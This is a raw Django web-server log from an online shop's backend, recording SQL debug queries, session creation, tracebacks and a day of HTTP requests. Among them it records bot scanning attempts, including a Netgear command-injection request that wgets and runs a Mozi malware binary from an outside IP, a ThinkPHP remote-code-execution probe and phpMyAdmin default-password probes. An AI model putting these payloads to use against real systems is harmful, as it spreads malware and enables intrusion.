"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-25 06:30:36,880 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-25 06:30:36,883 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-25 06:30:36,885 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [25/Dec/2019 06:30:36] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [25/Dec/2019 06:30:37] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [25/Dec/2019 06:30:37] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [25/Dec/2019 06:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [25/Dec/2019 06:35:18] "GET / HTTP/1.0" 302 0 [25/Dec/2019 06:40:21] "GET / HTTP/1.0" 302 0 [25/Dec/2019 06:45:24] "GET / HTTP/1.0" 302 0 [25/Dec/2019 06:50:26] "GET / HTTP/1.0" 302 0 [25/Dec/2019 06:55:29] "GET / HTTP/1.0" 302 0 [25/Dec/2019 07:05:02] "GET / HTTP/1.0" 302 0 [25/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 [25/Dec/2019 07:15:07] "GET / HTTP/1.0" 302 0 [25/Dec/2019 07:20:10] "GET / HTTP/1.0" 302 0 [25/Dec/2019 07:25:12] "GET / HTTP/1.0" 302 0 [25/Dec/2019 07:30:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /external.php [25/Dec/2019 07:30:11] "GET /external.php HTTP/1.0" 404 6456 [25/Dec/2019 07:30:15] "GET / HTTP/1.0" 302 0 [25/Dec/2019 07:37:28] "GET / HTTP/1.0" 302 0 [25/Dec/2019 07:42:31] "GET / HTTP/1.0" 302 0 [25/Dec/2019 07:47:33] "GET / HTTP/1.0" 302 0 [25/Dec/2019 07:52:36] "GET / HTTP/1.0" 302 0 [25/Dec/2019 07:57:38] "GET / HTTP/1.0" 302 0 [25/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 [25/Dec/2019 08:10:06] "GET / HTTP/1.0" 302 0 [25/Dec/2019 08:15:08] "GET / HTTP/1.0" 302 0 [25/Dec/2019 08:20:02] "GET /whm-server-status HTTP/1.0" 301 0 [25/Dec/2019 08:20:11] "GET / HTTP/1.0" 302 0 [25/Dec/2019 08:25:13] "GET / HTTP/1.0" 302 0 [25/Dec/2019 08:28:53] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-25 08:28:57,409 utils 4252 140031503103744 (0.012) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '85l9xuubdt1pvutn3pso54hm3a8v7wai' LIMIT 1; args=('85l9xuubdt1pvutn3pso54hm3a8v7wai',) DEBUG 2019-12-25 08:28:57,420 utils 4252 140031503103744 (0.008) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('85l9xuubdt1pvutn3pso54hm3a8v7wai', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-08T08:28:57.411790+00:00'::timestamptz); args=('85l9xuubdt1pvutn3pso54hm3a8v7wai', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 8, 8, 28, 57, 411790, tzinfo=)) [25/Dec/2019 08:28:57] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /robots.txt [25/Dec/2019 08:29:01] "GET /robots.txt HTTP/1.0" 404 6450 Not Found: /sitemap.xml [25/Dec/2019 08:29:04] "GET /sitemap.xml HTTP/1.0" 404 6453 [25/Dec/2019 08:30:16] "GET / HTTP/1.0" 302 0 [25/Dec/2019 08:35:43] "GET / HTTP/1.0" 302 0 [25/Dec/2019 08:40:58] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-25 08:40:58,579 utils 4252 140031503103744 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '22yvv68yk1ahx3x6zzm2ahj9grmtengf' LIMIT 1; args=('22yvv68yk1ahx3x6zzm2ahj9grmtengf',) DEBUG 2019-12-25 08:40:58,581 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('22yvv68yk1ahx3x6zzm2ahj9grmtengf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-08T08:40:58.579819+00:00'::timestamptz); args=('22yvv68yk1ahx3x6zzm2ahj9grmtengf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 8, 8, 40, 58, 579819, tzinfo=)) [25/Dec/2019 08:40:58] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [25/Dec/2019 08:41:33] "GET / HTTP/1.0" 302 0 [25/Dec/2019 08:46:36] "GET / HTTP/1.0" 302 0 [25/Dec/2019 08:51:39] "GET / HTTP/1.0" 302 0 [25/Dec/2019 08:59:12] "GET / HTTP/1.0" 302 0 [25/Dec/2019 09:01:25] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-25 09:01:25,912 utils 4252 140031503103744 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '51jk73knw4zgmmbx3mqy3ni6wkpt5gu3' LIMIT 1; args=('51jk73knw4zgmmbx3mqy3ni6wkpt5gu3',) DEBUG 2019-12-25 09:01:25,914 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('51jk73knw4zgmmbx3mqy3ni6wkpt5gu3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-08T09:01:25.912945+00:00'::timestamptz); args=('51jk73knw4zgmmbx3mqy3ni6wkpt5gu3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 8, 9, 1, 25, 912945, tzinfo=)) [25/Dec/2019 09:01:25] "GET /login/?next=/ HTTP/1.0" 200 1786 [25/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [25/Dec/2019 09:10:05] "GET / HTTP/1.0" 302 0 [25/Dec/2019 09:19:27] "GET / HTTP/1.0" 302 0 [25/Dec/2019 09:24:37] "GET / HTTP/1.0" 302 0 [25/Dec/2019 09:29:39] "GET / HTTP/1.0" 302 0 [25/Dec/2019 09:36:01] "GET / HTTP/1.0" 302 0 [25/Dec/2019 09:41:23] "GET / HTTP/1.0" 302 0 [25/Dec/2019 09:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [25/Dec/2019 09:46:42] "GET / HTTP/1.0" 302 0 [25/Dec/2019 09:51:45] "GET / HTTP/1.0" 302 0 [25/Dec/2019 09:56:47] "GET / HTTP/1.0" 302 0 [25/Dec/2019 10:05:02] "GET / HTTP/1.0" 302 0 [25/Dec/2019 10:10:05] "GET / HTTP/1.0" 302 0 [25/Dec/2019 10:15:07] "GET / HTTP/1.0" 302 0 [25/Dec/2019 10:20:10] "GET / HTTP/1.0" 302 0 [25/Dec/2019 10:22:42] "GET / HTTP/1.0" 302 0 [25/Dec/2019 10:25:13] "GET / HTTP/1.0" 302 0 [25/Dec/2019 10:30:16] "GET / HTTP/1.0" 302 0 [25/Dec/2019 10:35:18] "GET / HTTP/1.0" 302 0 [25/Dec/2019 10:40:21] "GET / HTTP/1.0" 302 0 [25/Dec/2019 10:45:24] "GET / HTTP/1.0" 302 0 [25/Dec/2019 10:50:27] "GET / HTTP/1.0" 302 0 [25/Dec/2019 10:55:29] "GET / HTTP/1.0" 302 0 [25/Dec/2019 11:04:57] "GET / HTTP/1.0" 302 0 [25/Dec/2019 11:10:40] "GET / HTTP/1.0" 302 0 [25/Dec/2019 11:15:43] "GET / HTTP/1.0" 302 0 [25/Dec/2019 11:20:45] "GET / HTTP/1.0" 302 0 [25/Dec/2019 11:25:48] "GET / HTTP/1.0" 302 0 [25/Dec/2019 11:30:50] "GET / HTTP/1.0" 302 0 [25/Dec/2019 11:35:53] "GET / HTTP/1.0" 302 0 [25/Dec/2019 11:40:56] "GET / HTTP/1.0" 302 0 [25/Dec/2019 11:45:59] "GET / HTTP/1.0" 302 0 [25/Dec/2019 11:51:02] "GET / HTTP/1.0" 302 0 [25/Dec/2019 11:56:04] "GET / HTTP/1.0" 302 0 [25/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [25/Dec/2019 12:11:48] "GET / HTTP/1.0" 302 0 [25/Dec/2019 12:16:51] "GET / HTTP/1.0" 302 0 [25/Dec/2019 12:25:32] "GET / HTTP/1.0" 302 0 [25/Dec/2019 12:32:37] "GET / HTTP/1.0" 302 0 [25/Dec/2019 12:33:03] "GET / HTTP/1.0" 302 0 [25/Dec/2019 12:40:23] "GET / HTTP/1.0" 302 0 [25/Dec/2019 12:47:15] "GET / HTTP/1.0" 302 0 [25/Dec/2019 12:52:18] "GET / HTTP/1.0" 302 0 [25/Dec/2019 12:55:01] "GET /whm-server-status HTTP/1.0" 301 0 [25/Dec/2019 12:57:19] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [25/Dec/2019 13:02:01] "GET /proxy.php HTTP/1.0" 404 6454 [25/Dec/2019 13:05:02] "GET / HTTP/1.0" 302 0 [25/Dec/2019 13:10:05] "GET / HTTP/1.0" 302 0 [25/Dec/2019 13:13:19] "GET / HTTP/1.0" 302 0 [25/Dec/2019 13:19:51] "GET / HTTP/1.0" 302 0 [25/Dec/2019 13:24:54] "GET / HTTP/1.0" 302 0 [25/Dec/2019 13:28:08] "GET / HTTP/1.0" 302 0 [25/Dec/2019 13:29:57] "GET / HTTP/1.0" 302 0 [25/Dec/2019 13:35:54] "GET / HTTP/1.0" 302 0 [25/Dec/2019 13:40:57] "GET / HTTP/1.0" 302 0 [25/Dec/2019 13:45:42] "GET / HTTP/1.0" 302 0 [25/Dec/2019 13:46:00] "GET / HTTP/1.0" 302 0 [25/Dec/2019 13:51:03] "GET / HTTP/1.0" 302 0 [25/Dec/2019 13:56:06] "GET / HTTP/1.0" 302 0 [25/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [25/Dec/2019 14:10:22] "GET / HTTP/1.0" 302 0 [25/Dec/2019 14:17:44] "GET / HTTP/1.0" 302 0 [25/Dec/2019 14:22:47] "GET / HTTP/1.0" 302 0 [25/Dec/2019 14:27:50] "GET / HTTP/1.0" 302 0 [25/Dec/2019 14:32:53] "GET / HTTP/1.0" 302 0 [25/Dec/2019 14:37:56] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [25/Dec/2019 14:38:31] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [25/Dec/2019 14:38:33] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=199 HTTP/1.0" 404 6532 Not Found: /newslist.asp [25/Dec/2019 14:38:34] "GET /newslist.asp?type=4&id=1370 HTTP/1.0" 404 6476 [25/Dec/2019 14:43:46] "GET / HTTP/1.0" 302 0 [25/Dec/2019 14:48:49] "GET / HTTP/1.0" 302 0 [25/Dec/2019 14:52:00] "GET / HTTP/1.0" 302 0 [25/Dec/2019 14:53:52] "GET / HTTP/1.0" 302 0 [25/Dec/2019 14:58:55] "GET / HTTP/1.0" 302 0 [25/Dec/2019 15:02:47] "GET / HTTP/1.0" 302 0 [25/Dec/2019 15:04:15] "GET / HTTP/1.0" 302 0 [25/Dec/2019 15:10:04] "GET / HTTP/1.0" 302 0 [25/Dec/2019 15:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [25/Dec/2019 15:15:07] "GET / HTTP/1.0" 302 0 [25/Dec/2019 15:20:10] "GET / HTTP/1.0" 302 0 [25/Dec/2019 15:25:13] "GET / HTTP/1.0" 302 0 [25/Dec/2019 15:30:15] "GET / HTTP/1.0" 302 0 [25/Dec/2019 15:35:02] "GET /whm-server-status HTTP/1.0" 301 0 [25/Dec/2019 15:35:18] "GET / HTTP/1.0" 302 0 [25/Dec/2019 15:40:21] "GET / HTTP/1.0" 302 0 [25/Dec/2019 15:49:42] "GET / HTTP/1.0" 302 0 [25/Dec/2019 15:54:45] "GET / HTTP/1.0" 302 0 [25/Dec/2019 15:59:48] "GET / HTTP/1.0" 302 0 [25/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [25/Dec/2019 16:10:05] "GET / HTTP/1.0" 302 0 [25/Dec/2019 16:15:08] "GET / HTTP/1.0" 302 0 [25/Dec/2019 16:20:11] "GET / HTTP/1.0" 302 0 [25/Dec/2019 16:25:14] "GET / HTTP/1.0" 302 0 [25/Dec/2019 16:30:16] "GET / HTTP/1.0" 302 0 [25/Dec/2019 16:35:19] "GET / HTTP/1.0" 302 0 [25/Dec/2019 16:40:22] "GET / HTTP/1.0" 302 0 [25/Dec/2019 16:46:03] "GET / HTTP/1.0" 302 0 [25/Dec/2019 16:51:06] "GET / HTTP/1.0" 302 0 [25/Dec/2019 16:58:19] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [25/Dec/2019 16:58:38] "GET /proxy.php HTTP/1.0" 404 6456 [25/Dec/2019 17:05:02] "GET / HTTP/1.0" 302 0 [25/Dec/2019 17:10:05] "GET / HTTP/1.0" 302 0 [25/Dec/2019 17:15:08] "GET / HTTP/1.0" 302 0 [25/Dec/2019 17:20:11] "GET / HTTP/1.0" 302 0 [25/Dec/2019 17:25:13] "GET / HTTP/1.0" 302 0 [25/Dec/2019 17:30:16] "GET / HTTP/1.0" 302 0 [25/Dec/2019 17:36:45] "GET / HTTP/1.0" 302 0 [25/Dec/2019 17:41:47] "GET / HTTP/1.0" 302 0 [25/Dec/2019 17:46:50] "GET / HTTP/1.0" 302 0 [25/Dec/2019 17:51:53] "GET / HTTP/1.0" 302 0 [25/Dec/2019 17:56:56] "GET / HTTP/1.0" 302 0 [25/Dec/2019 18:05:02] "GET / HTTP/1.0" 302 0 [25/Dec/2019 18:10:05] "GET / HTTP/1.0" 302 0 [25/Dec/2019 18:15:08] "GET / HTTP/1.0" 302 0 [25/Dec/2019 18:20:11] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [25/Dec/2019 18:20:12] "POST /editBlackAndWhiteList HTTP/1.0" 500 63915 [25/Dec/2019 18:25:14] "GET / HTTP/1.0" 302 0 [25/Dec/2019 18:30:17] "GET / HTTP/1.0" 302 0 [25/Dec/2019 18:35:19] "GET / HTTP/1.0" 302 0 [25/Dec/2019 18:40:22] "GET / HTTP/1.0" 302 0 [25/Dec/2019 18:45:02] "GET / HTTP/1.0" 302 0 [25/Dec/2019 18:45:25] "GET / HTTP/1.0" 302 0 Not Found: /mysql/admin/index.php [25/Dec/2019 18:47:04] "GET /mysql/admin/index.php?lang=en HTTP/1.0" 404 6491 Not Found: /mysql/dbadmin/index.php [25/Dec/2019 18:47:05] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.0" 404 6497 Not Found: /mysql/sqlmanager/index.php [25/Dec/2019 18:47:05] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.0" 404 6506 Not Found: /mysql/mysqlmanager/index.php [25/Dec/2019 18:47:06] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.0" 404 6512 Not Found: /phpmyadmin/index.php [25/Dec/2019 18:47:06] "GET /phpmyadmin/index.php?lang=en HTTP/1.0" 404 6488 Not Found: /phpMyadmin/index.php [25/Dec/2019 18:47:07] "GET /phpMyadmin/index.php?lang=en HTTP/1.0" 404 6488 Not Found: /phpMyAdmin/index.php [25/Dec/2019 18:47:08] "GET /phpMyAdmin/index.php?lang=en HTTP/1.0" 404 6488 Not Found: /phpMyAdmin/index.php [25/Dec/2019 18:47:08] "GET /phpMyAdmin/index.php?lang=en&pma_username=popa3d&pma_password=popa3d HTTP/1.0" 404 6536 [25/Dec/2019 18:50:28] "GET / HTTP/1.0" 302 0 [25/Dec/2019 18:55:31] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:10:06] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:12:57] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:15:09] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:25:07] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:30:10] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:35:13] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:40:16] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:45:19] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:47:12] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:47:40] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:51:12] "GET / HTTP/1.0" 302 0 [25/Dec/2019 19:56:15] "GET / HTTP/1.0" 302 0 [25/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 Not Found: /setup.cgi [25/Dec/2019 20:09:30] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://111.43.223.27:33902/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 6615 [25/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 [25/Dec/2019 20:15:08] "GET / HTTP/1.0" 302 0 [25/Dec/2019 20:20:10] "GET / HTTP/1.0" 302 0 [25/Dec/2019 20:26:58] "GET / HTTP/1.0" 302 0 [25/Dec/2019 20:30:02] "GET /whm-server-status HTTP/1.0" 301 0 [25/Dec/2019 20:32:01] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [25/Dec/2019 20:32:35] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [25/Dec/2019 20:32:37] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=200 HTTP/1.0" 404 6532 Not Found: /newslist.asp [25/Dec/2019 20:32:38] "GET /newslist.asp?type=4&id=1371 HTTP/1.0" 404 6476 [25/Dec/2019 20:37:03] "GET / HTTP/1.0" 302 0 [25/Dec/2019 20:42:06] "GET / HTTP/1.0" 302 0 [25/Dec/2019 20:47:09] "GET / HTTP/1.0" 302 0 [25/Dec/2019 20:52:12] "GET / HTTP/1.0" 302 0 [25/Dec/2019 20:57:15] "GET / HTTP/1.0" 302 0 [25/Dec/2019 21:02:34] "GET / HTTP/1.0" 302 0 [25/Dec/2019 21:10:04] "GET / HTTP/1.0" 302 0 [25/Dec/2019 21:15:07] "GET / HTTP/1.0" 302 0 [25/Dec/2019 21:20:09] "GET / HTTP/1.0" 302 0 [25/Dec/2019 21:25:12] "GET / HTTP/1.0" 302 0 [25/Dec/2019 21:28:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-25 21:28:28,606 utils 4252 140031503103744 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '91qg9ogssce8xxfb02ndjh836znpivo3' LIMIT 1; args=('91qg9ogssce8xxfb02ndjh836znpivo3',) DEBUG 2019-12-25 21:28:28,608 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('91qg9ogssce8xxfb02ndjh836znpivo3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-08T21:28:28.607351+00:00'::timestamptz); args=('91qg9ogssce8xxfb02ndjh836znpivo3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 8, 21, 28, 28, 607351, tzinfo=)) [25/Dec/2019 21:28:28] "GET /login/?next=/ HTTP/1.0" 200 1786 [25/Dec/2019 21:30:15] "GET / HTTP/1.0" 302 0 [25/Dec/2019 21:35:18] "GET / HTTP/1.0" 302 0 [25/Dec/2019 21:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [25/Dec/2019 21:40:21] "GET / HTTP/1.0" 302 0 Not Found: /index.php [25/Dec/2019 21:41:48] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 6564 [25/Dec/2019 21:41:48] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-25 21:41:48,927 utils 4252 140031503103744 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'tiifd2ryyhvz6fncoz3phowqy03mkhz1' LIMIT 1; args=('tiifd2ryyhvz6fncoz3phowqy03mkhz1',) DEBUG 2019-12-25 21:41:48,930 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('tiifd2ryyhvz6fncoz3phowqy03mkhz1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-08T21:41:48.928391+00:00'::timestamptz); args=('tiifd2ryyhvz6fncoz3phowqy03mkhz1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 8, 21, 41, 48, 928391, tzinfo=)) [25/Dec/2019 21:41:48] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [25/Dec/2019 21:44:50] "POST /editBlackAndWhiteList HTTP/1.0" 500 63913 [25/Dec/2019 21:45:24] "GET / HTTP/1.0" 302 0 [25/Dec/2019 21:50:27] "GET / HTTP/1.0" 302 0 [25/Dec/2019 21:55:29] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:04:25] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:10:06] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [25/Dec/2019 22:11:39] "POST /editBlackAndWhiteList HTTP/1.0" 500 63902 [25/Dec/2019 22:15:09] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:15:33] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:20:11] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:25:14] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:31:00] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:36:03] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:41:05] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:44:45] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:44:45] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:46:08] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:51:11] "GET / HTTP/1.0" 302 0 [25/Dec/2019 22:58:48] "GET / HTTP/1.0" 302 0 [25/Dec/2019 23:05:02] "GET / HTTP/1.0" 302 0 [25/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 [25/Dec/2019 23:19:11] "GET / HTTP/1.0" 302 0 [25/Dec/2019 23:24:21] "GET / HTTP/1.0" 302 0 [25/Dec/2019 23:25:50] "GET / HTTP/1.0" 302 0 [25/Dec/2019 23:30:53] "GET / HTTP/1.0" 302 0 [25/Dec/2019 23:35:56] "GET / HTTP/1.0" 302 0 [25/Dec/2019 23:44:12] "GET / HTTP/1.0" 302 0 [25/Dec/2019 23:46:47] "GET / HTTP/1.0" 302 0 [25/Dec/2019 23:49:14] "GET / HTTP/1.0" 302 0 [25/Dec/2019 23:54:43] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:00:02] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:09:57] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:17:04] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:22:07] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:27:10] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:30:56] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:34:04] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:35:56] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:39:07] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:44:10] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:50:14] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:55:17] "GET / HTTP/1.0" 302 0 [26/Dec/2019 00:57:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-26 00:57:42,631 utils 4252 140031503103744 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '1xnvcvxc6ls7eg71obdq4zy1zucw8kin' LIMIT 1; args=('1xnvcvxc6ls7eg71obdq4zy1zucw8kin',) DEBUG 2019-12-26 00:57:42,633 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('1xnvcvxc6ls7eg71obdq4zy1zucw8kin', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-09T00:57:42.632140+00:00'::timestamptz); args=('1xnvcvxc6ls7eg71obdq4zy1zucw8kin', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 9, 0, 57, 42, 632140, 